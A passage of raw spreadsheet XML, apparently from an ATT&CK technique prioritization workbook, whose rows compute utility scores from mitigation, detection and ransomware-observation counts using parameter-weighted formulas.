      <c r="AU46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69" spans="1:47">
      <c r="A469" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4761904761904765E-3</v>
      </c>
      <c r="B469" s="25">
        <f>SUM(H469,M469,V469)*(1+SUM(AE469,AG469,AI469,AK469,AM469))</f>
        <v>5.4761904761904762E-2</v>
      </c>
      <c r="C469" s="25" t="s">
        <v>1711</v>
      </c>
      <c r="D469" s="25" t="s">
        <v>1593</v>
      </c>
      <c r="E469" s="25" t="s">
        <v>1712</v>
      </c>
      <c r="F469" s="51">
        <v>0</v>
      </c>
      <c r="G469" s="51">
        <v>1</v>
      </c>
      <c r="H469" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I469">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J469">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K469">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L469">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M469" s="25">
        <v>0</v>
      </c>
      <c r="N469" s="51">
        <v>0</v>
      </c>
      <c r="O469" s="51">
        <v>0</v>
      </c>
      <c r="P469" s="51">
        <v>0</v>
      </c>
      <c r="Q469" s="51">
        <v>1</v>
      </c>
      <c r="R469" s="51"/>
      <c r="S469" s="51">
        <v>0</v>
      </c>
      <c r="T469" s="51"/>
      <c r="U469" s="51">
        <v>0</v>
      </c>
      <c r="V469" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W469">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X469">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y469">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z469">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA469">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB469">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC469" s="29"/>
      <c r="AD469" s="25" t="str" cm="1">
        <f t="array" ref="AD469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC469)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE469" s="25">
        <f>IF(AD469="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF469" s="25" t="str" cm="1">
        <f t="array" ref="AF469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC469)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG469" s="25">
        <f>IF(AF469="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH469" s="25" t="str" cm="1">
        <f t="array" ref="AH469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC469)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI469" s="25">
        <f>IF(AH469="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ469" s="25" t="str" cm="1">
        <f t="array" ref="AJ469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC469)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK469" s="25">
        <f>IF(AJ469="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL469" s="25" t="str" cm="1">
        <f t="array" ref="AL469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC469)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM469" s="25">
        <f>IF(AL469="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN469" s="60">
        <v>0</v>
      </c>
      <c r="AO469" s="51">
        <v>0</v>
      </c>
      <c r="AP469" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4761904761904765E-3</v>
      </c>
      <c r="AQ469" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AR469" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AS469" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT469" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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70" spans="1:47">
      <c r="A470" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4761904761904765E-3</v>
      </c>
      <c r="B470" s="25">
        <f>SUM(H470,M470,V470)*(1+SUM(AE470,AG470,AI470,AK470,AM470))</f>
        <v>5.4761904761904762E-2</v>
      </c>
      <c r="C470" s="25" t="s">
        <v>1713</v>
      </c>
      <c r="D470" s="25" t="s">
        <v>1714</v>
      </c>
      <c r="E470" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F470" s="51">
        <v>0</v>
      </c>
      <c r="G470" s="51">
        <v>1</v>
      </c>
      <c r="H470" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I470">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J470">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K470">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L470">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M470" s="25">
        <v>0</v>
      </c>
      <c r="N470" s="51">
        <v>0</v>
      </c>
      <c r="O470" s="51">
        <v>0</v>
      </c>
      <c r="P470" s="51">
        <v>0</v>
      </c>
      <c r="Q470" s="51">
        <v>1</v>
      </c>
      <c r="R470" s="51"/>
      <c r="S470" s="51">
        <v>0</v>
      </c>
      <c r="T470" s="51"/>
      <c r="U470" s="51">
        <v>0</v>
      </c>
      <c r="V470" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W470">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X470">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y470">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z470">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA470">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB470">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC470" s="29"/>
      <c r="AD470" s="25" t="str" cm="1">
        <f t="array" ref="AD470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE470" s="25">
        <f>IF(AD470="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF470" s="25" t="str" cm="1">
        <f t="array" ref="AF470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG470" s="25">
        <f>IF(AF470="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH470" s="25" t="str" cm="1">
        <f t="array" ref="AH470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI470" s="25">
        <f>IF(AH470="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ470" s="25" t="str" cm="1">
        <f t="array" ref="AJ470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK470" s="25">
        <f>IF(AJ470="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL470" s="25" t="str" cm="1">
        <f t="array" ref="AL470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM470" s="25">
        <f>IF(AL470="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN470" s="60">
        <v>0</v>
      </c>
      <c r="AO470" s="51">
        <v>0</v>
      </c>
      <c r="AP470" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4761904761904765E-3</v>
      </c>
      <c r="AQ470" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AR470" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AS470" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT470" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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71" spans="1:47" ht="48">
      <c r="A471" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.3233333333333345E-2</v>
      </c>
      <c r="B471" s="25">
        <f>SUM(H471,M471,V471)*(1+SUM(AE471,AG471,AI471,AK471,AM471))</f>
        <v>0.39900000000000008</v>
      </c>
      <c r="C471" s="25" t="s">
        <v>1715</v>
      </c>
      <c r="D471" s="25" t="s">
        <v>1716</v>
      </c>
      <c r="E471" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F471" s="51">
        <v>4</v>
      </c>
      <c r="G471" s="51">
        <v>2</v>
      </c>
      <c r="H471" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.30000000000000004</v>
      </c>
      <c r="I471">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J471">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K471">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L471">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M471" s="25">
        <v>0</v>
      </c>
      <c r="N471" s="51">
        <v>0</v>
      </c>
      <c r="O471" s="51">
        <v>0</v>
      </c>
      <c r="P471" s="51">
        <v>0</v>
      </c>
      <c r="Q471" s="51">
        <v>0</v>
      </c>
      <c r="R471" s="51"/>
      <c r="S471" s="51">
        <v>0</v>
      </c>
      <c r="T471" s="51"/>
      <c r="U471" s="51">
        <v>0</v>
      </c>
      <c r="V471" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W471">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X471">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y471">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z471">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA471">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB471">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC471" s="29" t="s">
        <v>1717</v>
      </c>
      <c r="AD471" s="25" t="str" cm="1">
        <f t="array" ref="AD471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC471)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE471" s="25">
        <f>IF(AD471="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF471" s="25" t="str" cm="1">
        <f t="array" ref="AF471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC471)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG471" s="25">
        <f>IF(AF471="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH471" s="25" t="str" cm="1">
        <f t="array" ref="AH471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC471)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI471" s="25">
        <f>IF(AH471="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ471" s="25" t="str" cm="1">
        <f t="array" ref="AJ471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC471)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK471" s="25">
        <f>IF(AJ471="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL471" s="25" t="str" cm="1">
        <f t="array" ref="AL471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC471)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM471" s="25">
        <f>IF(AL471="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN471" s="52">
        <v>1</v>
      </c>
      <c r="AO471" s="51">
        <v>1</v>
      </c>
      <c r="AP471" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.3233333333333345E-2</v>
      </c>
      <c r="AQ471" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13300000000000003</v>
      </c>
      <c r="AR471" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13300000000000003</v>
      </c>
      <c r="AS471" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT471" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU47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72" spans="1:47" ht="63.95">
      <c r="A472" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.9966666666666672E-2</v>
      </c>
      <c r="B472" s="25">
        <f>SUM(H472,M472,V472)*(1+SUM(AE472,AG472,AI472,AK472,AM472))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C472" s="25" t="s">
        <v>1718</v>
      </c>
      <c r="D472" s="25" t="s">
        <v>194</v>
      </c>
      <c r="E472" s="25" t="s">
        <v>1719</v>
      </c>
      <c r="F472" s="51">
        <v>1</v>
      </c>
      <c r="G472" s="51">
        <v>1</v>
      </c>
      <c r="H472" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I472">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J472">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K472">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L472">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M472" s="25">
        <v>0</v>
      </c>
      <c r="N472" s="51">
        <v>0</v>
      </c>
      <c r="O472" s="51">
        <v>0</v>
      </c>
      <c r="P472" s="51">
        <v>0</v>
      </c>
      <c r="Q472" s="51">
        <v>0</v>
      </c>
      <c r="R472" s="51"/>
      <c r="S472" s="51">
        <v>0</v>
      </c>
      <c r="T472" s="51"/>
      <c r="U472" s="51">
        <v>0</v>
      </c>
      <c r="V472" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W472">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X472">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y472">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z472">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA472">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB472">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC472" s="29" t="s">
        <v>195</v>
      </c>
      <c r="AD472" s="25" t="str" cm="1">
        <f t="array" ref="AD472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC472)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE472" s="25">
        <f>IF(AD472="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF472" s="25" t="str" cm="1">
        <f t="array" ref="AF472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC472)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG472" s="25">
        <f>IF(AF472="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH472" s="25" t="str" cm="1">
        <f t="array" ref="AH472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC472)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI472" s="25">
        <f>IF(AH472="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ472" s="25" t="str" cm="1">
        <f t="array" ref="AJ472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC472)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK472" s="25">
        <f>IF(AJ472="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL472" s="25" t="str" cm="1">
        <f t="array" ref="AL472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC472)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM472" s="25">
        <f>IF(AL472="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN472" s="60">
        <v>2</v>
      </c>
      <c r="AO472" s="51">
        <v>1</v>
      </c>
      <c r="AP472" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.9966666666666672E-2</v>
      </c>
      <c r="AQ472" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR472" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS472" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT472" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU47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73" spans="1:47" ht="48">
      <c r="A473" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4653333333333337E-2</v>
      </c>
      <c r="B473" s="25">
        <f>SUM(H473,M473,V473)*(1+SUM(AE473,AG473,AI473,AK473,AM473))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C473" s="25" t="s">
        <v>1720</v>
      </c>
      <c r="D473" s="25" t="s">
        <v>1721</v>
      </c>
      <c r="E473" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F473" s="51">
        <v>1</v>
      </c>
      <c r="G473" s="51">
        <v>1</v>
      </c>
      <c r="H473" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I473">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J473">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K473">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L473">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M473" s="25">
        <v>0</v>
      </c>
      <c r="N473" s="51">
        <v>0</v>
      </c>
      <c r="O473" s="51">
        <v>0</v>
      </c>
      <c r="P473" s="51">
        <v>0</v>
      </c>
      <c r="Q473" s="51">
        <v>0</v>
      </c>
      <c r="R473" s="51"/>
      <c r="S473" s="51">
        <v>0</v>
      </c>
      <c r="T473" s="51"/>
      <c r="U473" s="51">
        <v>0</v>
      </c>
      <c r="V473" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W473">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X473">
